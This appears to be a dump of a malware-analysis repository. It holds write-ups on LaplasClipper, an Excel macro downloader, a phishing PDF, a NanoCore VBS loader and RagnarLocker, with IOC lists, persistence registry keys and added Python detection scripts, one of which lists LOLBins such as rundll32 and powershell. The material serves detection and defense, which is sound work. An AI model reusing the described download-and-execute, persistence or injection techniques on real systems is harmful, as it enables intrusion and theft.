For better clarity, I've created the following map to consolidate the information:

![image](https://github.com/vc0RExor/Quick-Analysis/assets/91592110/963635c1-4cae-4bfa-8013-05c74a757033)

LaplasClipper has seemed to me a very interesting piece of malware about which there is not much information, which is why I have ventured into it. I am sure that a large number of criminal groups will make use of it, as it works quite fast and is quite stealthy. We will keep track of this malware and the use made of it, as well as of any new versions that appear, in order to keep improving detection possibilities.
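The clipboard substitution described in this analysis (the malware waits for a string matching one of its wallet regexes and swaps it for an attacker-controlled address of the same family) can be checked for from the defender's side by comparing what was copied with what actually arrives in the paste target. The following is an added example, not code from the sample or from this repository. The sample's own regex patterns are only visible as a screenshot above, so the patterns here are generic public address formats (Bitcoin legacy/P2SH, Bitcoin bech32, Ethereum) and are an assumption; the addresses are constructed test values of the right shape, not real wallets.

```python
"""Detect clipper-style wallet substitution: the pasted value differs from the
copied one while both match the same wallet-address family.

Added example; regexes are generic public address formats, not the sample's,
and every address below is a constructed placeholder.
"""
import re

WALLET_PATTERNS = {
    # base58, 26-35 chars, starts with 1 (P2PKH) or 3 (P2SH); no 0, O, I, l
    "btc_legacy": re.compile(r"^[13][a-km-zA-HJ-NP-Z1-9]{25,34}$"),
    # bech32 charset (no 1, b, i, o) after the bc1 prefix
    "btc_bech32": re.compile(r"^bc1[ac-hj-np-z02-9]{11,71}$"),
    "eth": re.compile(r"^0x[0-9a-fA-F]{40}$"),
}


def wallet_kind(text: str):
    """Return the wallet family a clipboard string looks like, or None."""
    text = text.strip()
    for kind, pattern in WALLET_PATTERNS.items():
        if pattern.match(text):
            return kind
    return None


def is_swapped(copied: str, pasted: str):
    """A clipper keeps the address family but changes the address.  Return the
    family when `pasted` differs from `copied` and both match the same pattern;
    return None for a benign copy/paste."""
    kind_copied, kind_pasted = wallet_kind(copied), wallet_kind(pasted)
    if kind_copied and kind_copied == kind_pasted and copied.strip() != pasted.strip():
        return kind_copied
    return None


# Constructed pairs: (what the user copied, what arrived in the paste target).
SAMPLE_EVENTS = [
    ("0x" + "1" * 40, "0x" + "1" * 40),          # untouched ETH address
    ("0x" + "1" * 40, "0x" + "2" * 40),          # ETH address swapped
    ("bc1q" + "z" * 38, "bc1q" + "x" * 38),      # bech32 address swapped
    ("1" + "A" * 33, "1" + "A" * 33),            # untouched legacy address
    ("hello world", "hello world"),              # not a wallet at all
]


def audit(events):
    """Return (index, family) for every pair in which a swap was observed."""
    findings = []
    for index, (copied, pasted) in enumerate(events):
        family = is_swapped(copied, pasted)
        if family:
            findings.append((index, family))
    return findings


if __name__ == "__main__":
    for index, family in audit(SAMPLE_EVENTS):
        print(f"event {index}: {family} address was replaced between copy and paste")
```

The same comparison is what a user can do by hand before confirming a transfer: the address shown in the wallet application must be the one that was copied, character for character, not merely one that "looks like" a valid address.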
Finally, I would like to thank you for reading this analysis and for supporting me :)

# _TTP

```
[T1140] Deobfuscate/Decode Files or Information
[T1027] Obfuscated Files or Information
[T1547.001] Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder
[T1129] Shared Modules (not sure about this one; for the library loads at runtime)
[T1095] Non-Application Layer Protocol
[T1106] Native API
[T1543] Create or Modify System Process
[T1082] System Information Discovery
[T1055] Process Injection
[T1115] Clipboard Data
```

# _IOC

```
78362eb5c4529001a3bc7ecab62b904afef81c63b6778ba00b99eb3398140dab
11c3e7a62b3e78c6ec720aea618bf0a3854ad42535f888532c3e206f3724db4c
4230177379ff0422741a5714ba02dbeccdac0edc6d2c1e4123827f23ff179e64
bdf326424f960a66d01dd645db9fd335a157ceb86d7f482ff15205fa7d9cc7b0
f022037056b50b4baf5db8ba0a437494662dc93cee9421ed12471e14a58a0d50
22b198c5fc1e073ef00fc7a44ca20db5f44630f4e0e746abcf2060207d7129d9
d30e2337e87b5bad478d20dea2fa51d38a4a9506542bdaaea7640dcc68a4432c
a3f665043305d67f64f7386a8bcd89dc5ce86a76a6b5042827af58cd8b4e10f2
17ca2de661fa07dd83a55a5005c61eb8aee1e9cab56e9a13bc36a27f4b785554

clipper[.]guru

85[.]192[.]40[.]252
206[.]189[.]229[.]43
185[.]209[.]161[.]61
168[.]100[.]10[.]236
45[.]66[.]230[.]149
```

> :t-rex: [vc0=Rexor](https://github.com/vc0RExor) :detective:


--------------------------------------------------------------------------------
/Macros/A macro downloader.md:
--------------------------------------------------------------------------------

# _Overview

_This malware normally comes inside an Office file (such as a .docx or .xls); the user downloads it through a malicious mail that tries to trick us into launching the download.
After that, when we try to open this file, it tries to execute the content; when it does, the macro will launch and you will see the malicious behavior._

# _How the malware doc gains access

As I've explained before, our malware comes through mail: the victim receives an attached file in a fake mail and, when the user accepts the content, the Office file (in our case a .XLS) is downloaded. At this point, the malware writer has a malicious file on your disk; the next step is execution, and to do that the user needs to open the file in MS Office (or a similar program).
The victim opens the malicious file and will see a ***fake "document signed to protect the file"*** notice that "needs" the content to be allowed. By default, this option is locked because macros are commonly used to launch malware or to act as downloaders.

![Alt text](https://user-images.githubusercontent.com/91592110/136939248-f1fcec91-b056-441e-9a14-75c29a752c93.png)

![image14](https://user-images.githubusercontent.com/91592110/136941194-6cc7bf21-41ed-415c-a462-3f32b0c357f1.png)

Now, when the content is enabled, the macro runs on your computer and the malicious behavior starts.

# _Macro Analysis & Extraction

After the macro launches, you will see the process _Excel.exe_ executing a _Rundll32.exe_; this is a good indicator that a document has a macro (as is launching a shell).

![image2](https://user-images.githubusercontent.com/91592110/136939682-cb1d0548-ed65-4481-868d-1ec073eacb0e.png)

Now we will analyze the macro contents to find interesting information: scanning the XLS document finds PE elements, which indicates that we have malicious content inside.
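The process chain described above (Excel spawning Rundll32.exe right after the macro is enabled) is the first thing a detection engineer would key on, because Office applications almost never need to launch that kind of child. The following is an added example, not code from this repository: it runs that parent/child rule over a few constructed, Sysmon-style process-creation records. The user name, the `invoice.xls` file name, the PIDs and the editor/notepad processes are illustrative assumptions; the `Goka.zzxxcc` DLL name and `DllRegisterServer` export come from this write-up.

```python
"""Flag an Office application spawning a LOLBin (rundll32, cmd, powershell...),
the macro execution chain seen in this analysis.

Added example; the records below are constructed, not captured telemetry.
"""
import ntpath

OFFICE_APPS = {"excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe"}
SUSPICIOUS_CHILDREN = {"rundll32.exe", "cmd.exe", "powershell.exe", "wscript.exe",
                       "cscript.exe", "mshta.exe", "regsvr32.exe"}

# Constructed process-creation records (pid, ppid, image, command line).
RECORDS = [
    {"pid": 3300, "ppid": 1200, "image": r"C:\Windows\explorer.exe",
     "cmdline": "explorer.exe"},
    {"pid": 5120, "ppid": 3300,
     "image": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "cmdline": r'"EXCEL.EXE" C:\Users\alice\Downloads\invoice.xls'},
    {"pid": 5388, "ppid": 5120, "image": r"C:\Windows\System32\rundll32.exe",
     "cmdline": r"rundll32.exe C:\Users\alice\AppData\Roaming\Goka.zzxxcc,DllRegisterServer"},
    {"pid": 6001, "ppid": 3300, "image": r"C:\Windows\System32\notepad.exe",
     "cmdline": "notepad.exe"},
    {"pid": 6100, "ppid": 6001, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "cmd.exe /c dir"},
]


def office_spawn_alerts(records):
    """Return one alert per LOLBin whose direct parent is an Office application."""
    by_pid = {r["pid"]: r for r in records}
    alerts = []
    for record in records:
        parent = by_pid.get(record["ppid"])
        if parent is None:
            continue
        child_name = ntpath.basename(record["image"]).lower()
        parent_name = ntpath.basename(parent["image"]).lower()
        if parent_name in OFFICE_APPS and child_name in SUSPICIOUS_CHILDREN:
            alerts.append({
                "parent": parent_name,
                "child": child_name,
                "pid": record["pid"],
                "cmdline": record["cmdline"],
                # A DLL argument under %APPDATA% strengthens the signal: that is
                # where this campaign drops its payload before registering it.
                "appdata_dll": "\\appdata\\" in record["cmdline"].lower(),
            })
    return alerts


if __name__ == "__main__":
    for alert in office_spawn_alerts(RECORDS):
        print(f"{alert['parent']} -> {alert['child']} (pid {alert['pid']}): {alert['cmdline']}")
```

The notepad.exe to cmd.exe pair is deliberately left in the sample so that the rule is seen to ignore LOLBin children of non-Office parents; tightening it further (for example, only alerting when the command line points into a user-writable directory) is what the `appdata_dll` flag is for.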
![image3](https://user-images.githubusercontent.com/91592110/136939736-1a2368e5-3547-4cf5-ab71-5faba80677f7.png)

After a first overview, we persist using more tools and find an _"AutoExec"_ called _WorkBook_ inside the XLS, a registry entry that calls a DLL, and obfuscated VBA. We can see the path _%APPDATA%\Roaming_, a path normally used by malware, like _%TEMP%_, where it later gains persistence using a regkey or drops more malware. We can also see a string called _"Goka"_; it will be interesting in a few moments.

![image4](https://user-images.githubusercontent.com/91592110/136939787-37a9f328-2094-4eb2-9d25-10f8aceab5b2.png)

![image5](https://user-images.githubusercontent.com/91592110/136939794-583e85fd-166f-4846-b97b-2791399dad97.png)

As we have a _Workbook_ inside the XLS, we can research it and extract all of its contents, and we will see things such as imports, URLs...

![image6](https://user-images.githubusercontent.com/91592110/136939924-1db8f681-de14-4bc6-863c-8c0ab109f672.png)

![image7](https://user-images.githubusercontent.com/91592110/136939940-cdc9c6ae-2191-466b-abb3-91c19cbd2508.png)

Now we have a good IOC, a domain _(hXXp://asengjewelry[.]com/)_, and indicators that the macro will try to download a file (DownloadToFileA) and use it to gain persistence (DllRegisterServer).

Looking up this domain, we find that it's detected by several engines in VirusTotal, and that the domain is from Thailand and contains several hosts. This is common in malware: the goal is to persist over time, using the same attack but switching the host, or using several hosts at the same time. Our host is thz09.

![image8](https://user-images.githubusercontent.com/91592110/136940007-b267690b-2226-4789-be8f-fd8369dd0882.png)

![image9](https://user-images.githubusercontent.com/91592110/136940017-d2e08762-9751-499c-ad4a-17f13baf705e.png)

# _Behavior

At this point, we know that this file is malware, but we can research its behavior a little more. By now, we know this:

> - Excel will run a Rundll32.exe after macro execution
> - It will persist using regkeys
> - It uses PE files as DLLs
> - It tries to connect to a malicious URL and download a file

Launching the XLS again and accepting the macro execution, we see the _Rundll32.exe_ again.

![image10](https://user-images.githubusercontent.com/91592110/136940484-04cd0395-48c7-4c9b-9e39-725456ab49c9.png)

Later, Rundll32.exe will find the DLL downloaded from the domain _asengjewelry.com_; the request is for a fake .jpg, but this is the DLL.

![image11](https://user-images.githubusercontent.com/91592110/136940525-32217181-7d8a-49dc-85d7-672de0588d97.png)

![image12](https://user-images.githubusercontent.com/91592110/136940549-5b6c260a-97ad-4ade-bb4f-74393e555ff8.png)

Once the DLL is downloaded, we already have it in the path we saw at the previous point: it is dropped in Roaming as Goka.zzxxcc, and it persists through COM by creating a regkey. Normally that campaign uses Schtasks for this; usually, malware uses _\CurrentVersion\RUN_, services or tasks to gain persistence on our computers.

![image13](https://user-images.githubusercontent.com/91592110/136940662-86d9cb95-2577-42af-b2db-5dfd430372c8.png)

This malware is usual in this world; it's normal to see malware writers using tricks such as changing the file extension, phishing, fake mails or public domains to infect machines. These files are really useful to gain persistence, and later to open backdoors, build botnets and so on.

> :t-rex: [vc0=Rexor](https://github.com/vc0RExor) :detective:

-------------------------------------------------------------------------------- /PDF/A phishing PDF downloader.md: --------------------------------------------------------------------------------

# _Initial access: Phishing

This PDF reaches our systems through phishing techniques. It's common to see malicious files like docx, pdf or ppt that try to get downloaded using a fake UPS mail or a "new policy" from your bank; usually you will be expecting a shipment, and it's not rare to see fake mails about new changes on an account (Google, Amazon...). Once the PDF arrives in your mail, it tries to trick you into downloading it; once downloaded it has disk access, and if you launch the PDF with a PDF reader (like Acrobat, Foxit...) it will run the malicious activity.

# _Overview

In the event that the user has not noticed that the mail is fake or that its URL is not real, and the PDF has already been downloaded on the computer, we can see that it contains suspicious strings. We find interesting tags, URLs, PDF names and so on; later we will analyze it, but we can already start gathering IOC.
As you can see, these URLs are HTTPS. That's because it is better to use many hosts on 443 under legitimate domains and introduce paths used for malware, which will be closed after a few days, than to use HTTP or random domains that some IPS/IDS will block instantly.

![100000000000018C0000010CA4AF646E2A5294F8](https://user-images.githubusercontent.com/91592110/136981977-3d7eb64e-73f4-4dbf-9cb6-b9371d437539.png)

There are detected elements, but we also have a lot of URLs to create blacklists and to add to the IOC.

![100000000000029C000000D18992B14A95BDD269](https://user-images.githubusercontent.com/91592110/136982040-752d1ff3-5832-4e06-90d3-f83a368f793e.png)

In addition to URLs and PDF names, we have several streams encoded in different ways, such as /FlateDecode; the PDF uses /Filter to tell the reader how to decode the chunk bytes. It's common to see these filters: using them you can hide domains and scripts so that you can't see them with strings or similar tools... let's say it makes analysis harder...

![100000000000009300000066EAE1BE83956AAF78](https://user-images.githubusercontent.com/91592110/136982073-c0db39a0-8eee-4a7e-b16f-815b4297f168.png)

Now we have several indicators telling us that this could be a malicious PDF; we need to investigate its behaviour, and later we will analyze these tags internally.

# _Behaviour

Once we have a background where we know that this PDF will perform malicious behaviour, we need to find out how it works.
At runtime, the PDF opens several instances and a window where it tries to check that we are not a robot. This is a FAKE authenticator: it is not a real form but a picture that tries to send us to cctraff[.]ru.

![100000000000011D000000A999D35EC779D1DC73](https://user-images.githubusercontent.com/91592110/136982190-b430d2d1-7a23-4ede-9ead-af3486879bf1.png)

![behaviour](https://user-images.githubusercontent.com/91592110/136982493-a5f3e914-c8f9-4402-9c09-2a8351713034.png)

This PDF has 2 pages; on the second one we have some paths, PDF names and domains, some of which are already detected.

![100000000000011E000000F25419F8ECE5E37D6A](https://user-images.githubusercontent.com/91592110/136982304-415aa384-8dcd-48d1-84d6-532ac825c90b.png)

![10000000000002A8000000D27E26B1C05CCF0BC9](https://user-images.githubusercontent.com/91592110/136982317-06e93412-80d2-4e40-a6f2-97662169e379.png)

After we submit the FAKE authenticator, it takes us to another fake authenticator (robotcheckion[.]online) that wants us to allow notifications, which are then used to send us to malicious web pages.

![10000000000002C500000274994292EA85D51EE1](https://user-images.githubusercontent.com/91592110/136982358-54235596-e60c-4b31-98a5-5741d71772d7.png)

Once the authenticator is launched, we find several URLs that try to download other files or PDFs.

![10000000000002010000001781968E2C8A449B6C](https://user-images.githubusercontent.com/91592110/136982522-85ba563e-3b36-46a7-bfb9-04e17afaf8ed.png)

![10000000000001A1000000203BD689BACD3B4360](https://user-images.githubusercontent.com/91592110/136982544-5f154188-60ef-4fab-a19d-5b984096b59e.png)

Sniffing and analyzing the network, we can see a lot of chrome.exe instances (Chrome uses many instances, as you know, but this malware also uses many URLs) trying to download any file. That's not rare, because this kind of malware can be caught quickly and needs to have several web pages available in case an enterprise blocks some of them.

But we can see the URL accesses and the fake authenticators:

![100000000000011A00000089197AEB424ACFB230](https://user-images.githubusercontent.com/91592110/136982631-78fb39f7-f794-41b5-aee4-5cfbb0011658.png)

![10000000000001030000007A13EDF8F71867B116](https://user-images.githubusercontent.com/91592110/136982644-26b603d6-a647-4e44-9d3d-c30ad7589205.png)

It's normal that when you are analyzing the sample you can't find any active URL, or you need to search among the web pages that host the malware, but you only need to be patient and find one that downloads the file to complete your analysis (if you have the downloadable file names, you can search for them in [VirusTotal](https://www.virustotal.com/gui/home/search) or [AlienVault](https://otx.alienvault.com/browse/global) if all the domains are already closed).

Talking about the registry, the malware adds some bytes to the chrome.exe entry under UserAssist and erases caches (that's not rare), but we don't have any persistence trick here, which would be the most worrying thing. In case you did not know, the UserAssist entries that count program executions are stored with their names ROT-13 encoded; this practice, and modifying extension values, can be seen in some adware, but we don't have strange behaviours related to RegKeys in our malware.
An example of ROT-13:

![1000000000000424000000121C900F137E0AF2F3](https://user-images.githubusercontent.com/91592110/136982941-59785539-e547-451e-a31b-7e30c7e62536.png)

![100000000000013E000000B4C3D61CB4A751E40C](https://user-images.githubusercontent.com/91592110/136982959-e81c1ff5-b6bc-44b3-9a87-ae6eac5330ba.png)

This behaviour is unusual for a legitimate PDF. Now we have a good background to locate several URLs and information on how it works dynamically, so we move on to an internal static analysis to find out whether this is the only thing it does.

# _Static Analysis

Now we need to know whether the functionality is only based on going through a URL list and downloading other files and malicious PDFs, or whether there is something else.

First of all, we look at the PDF tags and find interesting elements: some objects, URIs (we're not surprised) and good news, no JavaScript there, so it's likely that we are facing a PDF downloader.

![10000000000000DD0000011CAA2C9B97155C111D](https://user-images.githubusercontent.com/91592110/136983050-f6e7bb93-3b5d-4dce-8c9e-49cd37b351e3.png)

We find several elements related to colors, buttons and so on, which are the graphic components of the PDF (the first fake authenticator), and some /Filter entries using /FlateDecode to decompress streams.

![10000000000000BF000000C2451C5876AE498FEB](https://user-images.githubusercontent.com/91592110/136983104-56e388e9-4d14-4e58-a687-4934d8d8ccdf.png) ![1000000000000095000000A9D760ACC89F85AE1D](https://user-images.githubusercontent.com/91592110/136983123-87b9e62e-a4aa-4883-ac75-c479d708ae4d.png)

Later, using /Annot, we have the references to the URIs we are looking for (showing objects 17 and 19):

![10000000000002A3000000CAE6416424A280BCA2](https://user-images.githubusercontent.com/91592110/136983208-d902e43c-9c50-4844-a2bc-78a69881e7d1.png)
![1000000000000296000000D16E8A85589E004D88](https://user-images.githubusercontent.com/91592110/136983257-676a3bd5-0105-4c8d-a3c0-83a107a3ab47.png)

Also, all the URLs are referenced by object 40; as you can see, each URL is represented by an object, with numbers between 17 and 32 (as you can see in the picture below), and any of these objects can download other malware by referring to different domains and files (previous image).

![100000000000034A0000003AAC2E640B9EA7241A](https://user-images.githubusercontent.com/91592110/136983324-f22399a8-3546-47d9-b3f7-9192020bdf6e.png)

Inside the PDF we don't have anything more of interest: we have a lot of URL, PDF and file references, and the rest is graphic content such as fake authenticators, fonts, buttons and so on.
This time, unfortunately, we don't have elements such as JavaScript, because this malware is a downloader. Its purpose is to mislead the user into believing that this PDF is a portal to other web pages that need to verify you are not a robot, using forms that look like a real authenticator, through which other files or PDFs are downloaded from other malicious web pages. Against this kind of malware, which typically uses phishing techniques, a good enterprise policy is advisable: blocking specific domains and training workers so that they can distinguish a real mail from a fake one. Let's not forget that the greatest weakness is the user.
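The static analysis above walks /Annot objects by hand and notes that /FlateDecode hides strings from tools like `strings`. The script below is an added example (not the write-up's tooling) that automates that walk: it enumerates objects, inflates /FlateDecode streams, pulls the /URI targets and defangs them for an IOC list. The PDF it parses is constructed in memory and its URLs are placeholders.

```python
"""Pull /URI targets out of a PDF's /Annot objects, inflating /FlateDecode
streams first so that links hidden inside compressed objects are found too.

Added example for this write-up, not the author's own tooling. The PDF it
parses is constructed in memory and its URLs are placeholders; the object
layout (a clear-text link annotation beside a compressed one) mirrors the
/Annot objects discussed above.
"""
import re
import zlib
from urllib.parse import urlsplit

# "N G obj ... endobj": one indirect object, body captured lazily
OBJ_RE = re.compile(rb"(\d+)\s+(\d+)\s+obj(.*?)endobj", re.DOTALL)
# where the stream payload starts; its size comes from /Length
STREAM_START_RE = re.compile(rb"stream\r?\n")
# direct /Length only; an indirect "/Length 7 0 R" is not resolved here
LENGTH_RE = re.compile(rb"/Length\s+(\d+)(?!\s+\d+\s+R)")
# /URI (literal string) entries; parentheses inside the URL are not handled
URI_RE = re.compile(rb"/URI\s*\(([^)]*)\)")


def inflate_object(body: bytes) -> bytes:
    """Return the object body with a /FlateDecode stream replaced by its
    inflated bytes; other filters and corrupt streams are left untouched."""
    m = STREAM_START_RE.search(body)
    length = LENGTH_RE.search(body[: m.start()]) if m else None
    if not m or not length or b"/FlateDecode" not in body[: m.start()]:
        return body
    start, end = m.end(), m.end() + int(length.group(1))
    try:
        return body[: m.start()] + zlib.decompress(body[start:end]) + body[end:]
    except zlib.error:
        return body


def extract_uris(pdf: bytes) -> dict:
    """Map object number -> list of /URI strings found in that object."""
    found = {}
    for num, _gen, body in OBJ_RE.findall(pdf):
        body = inflate_object(body)
        if b"/Annot" not in body and b"/URI" not in body:
            continue
        uris = [u.decode("latin-1") for u in URI_RE.findall(body)]
        if uris:
            found[int(num)] = uris
    return found


def defang(url: str) -> str:
    """Render a URL in the hXXps://host[.]tld form used in IOC lists."""
    p = urlsplit(url)
    tail = p.path + (f"?{p.query}" if p.query else "")
    return f"{p.scheme.replace('http', 'hXXp')}://{p.netloc.replace('.', '[.]')}{tail}"


def build_sample_pdf() -> bytes:
    """Constructed two-link PDF: object 5 carries its link in clear text,
    object 6 hides the same kind of link inside a /FlateDecode stream."""
    clear = (b"<< /Type /Annot /Subtype /Link /Rect [0 0 10 10] "
             b"/A << /S /URI /URI (https://example.test/first.pdf) >> >>")
    hidden = zlib.compress(
        b"<< /Type /Annot /Subtype /Link /Rect [0 0 10 10] "
        b"/A << /S /URI /URI (https://cdn.example.test/files/second.pdf) >> >>")
    objects = [
        b"1 0 obj << /Type /Catalog /Pages 2 0 R >> endobj",
        b"2 0 obj << /Type /Pages /Kids [3 0 R] /Count 1 >> endobj",
        b"3 0 obj << /Type /Page /Parent 2 0 R /Annots [5 0 R 6 0 R] >> endobj",
        b"5 0 obj " + clear + b" endobj",
        b"6 0 obj << /Length %d /Filter /FlateDecode >>\nstream\n" % len(hidden)
        + hidden + b"\nendstream endobj",
    ]
    return b"%PDF-1.4\n" + b"\n".join(objects) + b"\n%%EOF\n"


if __name__ == "__main__":
    for obj, urls in sorted(extract_uris(build_sample_pdf()).items()):
        for u in urls:
            print(f"obj {obj}: {defang(u)}")
```

A plain string search over the same file only reports the first link; the second only appears after the stream is inflated.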
# _IOC

> :t-rex: [vc0=Rexor](https://github.com/vc0RExor) :detective:

-------------------------------------------------------------------------------- /RAT/NanoCore/A VBS loader of NanoCore.md: --------------------------------------------------------------------------------

# _Overview

_NanoCore is a RAT (Remote Admin Tool) used by cybercriminal groups such as APT33 (Refined Kitten). Its initial access is varied, although it has most commonly been delivered through fake emails with .zipx extensions or with fake formats, which is commonly called phishing (T1566) or, in this case, since the email contains a file and its objective is execution on disk to go further, it would be more accurate to call it Spearphishing (T1566.001)._

The main potential of NanoCore is usually mining or stealing data from the computer and the user once it has gained access to the disk, but once it is inside it could perform any action from outside, and of course it depends on the version.

For this analysis I have divided the work into two parts, which is a common practice: first we observe statically everything we can get in the shortest possible time, and then a dynamic part in which we see how it behaves, although we will lose information if we do not monitor properly or debug.

# _Static Analysis: Obfuscated Script

We start from a VisualBasicScript (VBS) which is quite obfuscated, although we can distinguish some interesting words like "_http_" or "_OwerSheL_" and some "_replace_" calls that will help us in the deobfuscation; for now we can't see much, so we have to get to work.

![image](https://user-images.githubusercontent.com/91592110/139471648-e3465f5e-b7ac-47a7-bbb2-4dedd01dfb4e.png)

After working on deobfuscating the script and getting the most out of it in the shortest possible time, we can see in a small scheme how this first stage works.
In it, we find an IP [ _52[.]231.98[.]236_ ] to which it will make a download request using "_DownloadString_", as expected using PowerShell, and after this it will execute the content it downloads.

![image](https://user-images.githubusercontent.com/91592110/139471880-9c73a086-1d7c-4188-ab2a-a330e2712a18.png)

In a controlled environment we visit the website against which the request is made, and we may find another similar script (the one executed previously) which, as usual in this type of loader, hides another obfuscated script, creating script chains so that analysts lose interest or the difficulty of the analysis increases, and so that the campaigns last as long as possible.

![image](https://user-images.githubusercontent.com/91592110/139471974-26258efa-b8bc-46d3-8bf0-6f9fde4efe27.png)

Later, we find another obfuscated script that tries to do the same as the previous one: complicate the work and let us learn as little as possible about the attack.

![image](https://user-images.githubusercontent.com/91592110/139472315-1da288ab-bdc6-4f9f-b0a3-69b6f969ae3d.png)

After the previous script, we move on to the next one, in which we can see how it makes another request to the same IP, but this time for another file (_Server.txt_) which at the time of analysis was expected to be another obfuscated file, which we will see now. After this deobfuscation, we can see that the attacker manages to generate persistence in RUN by introducing a New.vbs file in it, which is none other than the same file as before and will execute again every time the system starts; this would be Persistence (TA0003), whose more concrete technique would be T1547.

We see that it also collects in variables the RegKey _\Explorer\User Shell Folders_ to generate persistence: simply put, you can enter a registry value in the previous key pointing to _\Public\Run\New.vbs_ and you will get the desired execution at each session startup.
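The User Shell Folders redirect described above is easy to miss because the classic Run key stays clean. As an added check (not the write-up's own code), the script below resolves the Startup values of that key against a supplied environment and flags any that point outside the expected profile root, such as the \Public\Run folder the loader writes New.vbs into. The registry values and environment mapping are constructed for the example.

```python
"""Check the Explorer 'User Shell Folders' values for the redirect described
above: pointing Startup at a folder such as \\Public\\Run so that a dropped
New.vbs runs at every logon without touching the classic Run key.

Added example for this write-up, not the author's tooling. The values are
passed in as a dict, as you would get them by reading the HKCU (or, for
"Common Startup", the HKLM) copy of
...\\CurrentVersion\\Explorer\\User Shell Folders; the sample values and the
environment mapping below are constructed.
"""
import ntpath
import re

# Autostart value names and the environment root each must stay under
STARTUP_VALUES = {"Startup": "USERPROFILE", "Common Startup": "PROGRAMDATA"}
ENV_RE = re.compile(r"%([^%]+)%")


def expand(path, env):
    """Expand %VAR% references from the supplied mapping (not os.environ),
    so the check can run against values exported from another machine."""
    return ENV_RE.sub(lambda m: env.get(m.group(1).upper(), m.group(0)), path)


def audit_shell_folders(values, env):
    """Return (value name, raw data, resolved path) for every autostart
    folder that resolves outside its expected root."""
    findings = []
    for name, root_var in STARTUP_VALUES.items():
        raw = values.get(name)
        if raw is None:
            continue
        resolved = ntpath.normpath(expand(raw, env)).lower()
        root = ntpath.normpath(env[root_var]).lower()
        if not resolved.startswith(root + "\\"):
            findings.append((name, raw, resolved))
    return findings


# Constructed environment of the machine being audited
SAMPLE_ENV = {"USERPROFILE": r"C:\Users\analyst",
              "PROGRAMDATA": r"C:\ProgramData",
              "PUBLIC": r"C:\Users\Public"}

# Windows defaults for both values
CLEAN_VALUES = {
    "Startup": r"%USERPROFILE%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup",
    "Common Startup": r"%ProgramData%\Microsoft\Windows\Start Menu\Programs\StartUp",
}
# Startup redirected to the public folder the loader drops New.vbs into
TAMPERED_VALUES = dict(CLEAN_VALUES, Startup=r"%PUBLIC%\Run")

if __name__ == "__main__":
    print("clean:", audit_shell_folders(CLEAN_VALUES, SAMPLE_ENV))
    print("tampered:", audit_shell_folders(TAMPERED_VALUES, SAMPLE_ENV))
```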
Persistence using a RegKey pointing to the vbs:
```
HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
```
![image](https://user-images.githubusercontent.com/91592110/139473111-03257fef-3043-4948-8eca-85cc15a29f0c.png)

For a better understanding, the scheme of the deobfuscation is the previous one, in which we observe in cascade, in a summarized way, how the deobfuscation has been done. After this, the connection to the IP releases another file that, as we can see, alerts us of a PE signature with the typical _0x4D5A_.

As we have seen in the previous image, we take out the binary and, as expected, we get the NanoCore client, as usual with an obfuscator on top.

![image](https://user-images.githubusercontent.com/91592110/139473921-6e9e5944-f900-4158-bf8a-38a4f5710eb9.png)

# _Dynamic Analysis: Monitoring execution

After the static section, we know how it is going to behave and we have a clear idea of where to put the focus, so we observe how PowerShell is going to be executed; in it we see how it makes the request to the first web, and if we did not have the file physically, we would have to extract it manually from this request.

An important aspect is the use of aspnet_compiler.exe, since it is usual in this type of RAT to inject the code of the final binary (or perform process hollowing) into legitimate software. We will see that it stays running after the execution of the loader; the reason is simple, the RAT has already started and is doing its task, and at first glance you cannot see anything abnormal. We can also see MSBuild.exe injected.
![image](https://user-images.githubusercontent.com/91592110/139474281-fc36362d-8231-437a-9472-72653033ed13.png)

After running PowerShell, we can see the same request 2 times to obtain the succession of obfuscated scripts, at the end of which we obtain the RAT.

![image](https://user-images.githubusercontent.com/91592110/139474330-46e85380-c300-4e40-a1f1-393bd8d9645b.png)

![image](https://user-images.githubusercontent.com/91592110/139474364-c60ddb80-fa11-48af-8fac-f436a2a17239.png)

After this, we see how it has introduced the file in _\public\run_, so it has generated the persistence in the registry key that we mentioned in the previous section.

![image](https://user-images.githubusercontent.com/91592110/139474555-9a495ae9-6740-40a9-929e-16b649f667fd.png)

Then we see, as usual in this malware, that it collects certain information, obfuscates it and places it in some path under \AppData\ or \Public\ with .dat extensions, directories usually used for this type of action so that, as far as possible, it is not found.
![image](https://user-images.githubusercontent.com/91592110/139474569-668aac42-5e51-412f-895d-4bb6d38e3cab.png)

> :t-rex: [vc0=Rexor](https://github.com/vc0RExor) :detective:

-------------------------------------------------------------------------------- /RAT/Readme: --------------------------------------------------------------------------------

-------------------------------------------------------------------------------- /README.md: --------------------------------------------------------------------------------

# Quick-Analysis

-------------------------------------------------------------------------------- /Ransomware/RagnarLocker/Quick view RagnarLocker.md: --------------------------------------------------------------------------------

# _Overview

_RagnarLocker is a ransomware normally associated with the APT Viking Spider, whose initial access is varied, but as usual they perform direct attacks trying to exploit systems, or abuse legitimate applications, or implant malware inside them; after these movements, the most common goal is to gain maximum access and control within the attacked company in order to encrypt as many computers as possible._

# _Technical Analysis

In the first steps, we find a function common in ransomware that tries to determine in which country the malware is running. This is because certain groups choose targets depending on the country and avoid certain countries. As we can see, it locates which country we belong to using _GetLocaleInfoW_ and compares it against an internal list of countries used as an exclusion; if our country were in the list and the function returned any of the listed values, it would end the execution.
![image](https://user-images.githubusercontent.com/91592110/139923142-19aa7ac8-2b13-4c2e-8a89-103490001972.png)

List of country languages:

```
Belorussian
Azerbaijani
Ukrainian
Moldavian
Georgian
Armenian
Turkmen
Russian
Kyrgyz
Kazakh
Uzbek
Tajik
```

Later, it obtains the computer name and user data, as well as the MachineGUID of the computer using the Microsoft Cryptography RegKey, or the ProductName using the RegKey _Windows NT\Current Version_, something that ransomware usually does to obtain information from the computer that it can then use to identify the machines.

![image](https://user-images.githubusercontent.com/91592110/139928520-4eced539-28fe-463e-ab68-0a50fc2722d1.png)

![image](https://user-images.githubusercontent.com/91592110/139928541-f62a525d-4347-44e9-a4f4-7cb21694671c.png)

![image](https://user-images.githubusercontent.com/91592110/139928549-15463579-6611-49eb-be85-bd27251436d5.png)
![image](https://user-images.githubusercontent.com/91592110/139928561-80278c35-7098-46a9-a70e-ff63b7f67340.png)

